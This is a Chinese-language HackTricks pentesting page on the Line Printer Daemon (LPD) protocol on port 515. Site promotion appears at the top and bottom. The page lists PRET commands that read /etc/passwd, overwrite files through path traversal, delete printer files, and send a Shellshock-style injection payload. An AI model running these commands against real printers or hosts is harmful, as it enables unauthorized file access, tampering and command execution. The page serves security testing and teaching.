零基础学习 AWS 黑客攻击直至成为专家 htARTE (HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
* 如果您希望在 **HackTricks 中看到您的公司广告** 或 **下载 HackTricks 的 PDF 版本**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFT 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上 **关注** 我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库 **提交 PR 来分享您的黑客技巧。**
Line Printer Daemon (LPD) 协议最初是在 80 年代的 Berkeley Unix 中引入的(后来由 RFC1179 规范定义)。\
该守护进程运行在 515/tcp 端口,并可以使用 `lpr` 命令访问。为了打印,客户端发送一个定义作业/用户名的 **控制文件** 和一个包含实际打印数据的 **数据文件**。数据文件的 **输入类型** 可以通过在控制文件中选择 **各种文件格式** 来设置。然而,如何实际处理打印数据取决于 LPD 的实现。一个流行的 Unix-like 操作系统的 LPD 实现是 LPRng。LPD 可以用作部署 **恶意 PostScript** 或 **PJL 打印作业** 的载体。
[**PRET**](https://github.com/RUB-NDS/PRET) 包含了 `lpdprint` 和 `lpdtest` 工具**。** 它们是直接向 LPD 兼容打印机打印数据或下载/上传/删除文件等的简约方式:
```
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
```
如果您想了解更多关于[**黑客打印机的信息,请阅读此页面**](pentesting-printers/)。
# Shodan
* `端口 515`
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS 红队专家)!
其他支持HackTricks的方式:
* 如果您希望在HackTricks上看到您的**公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。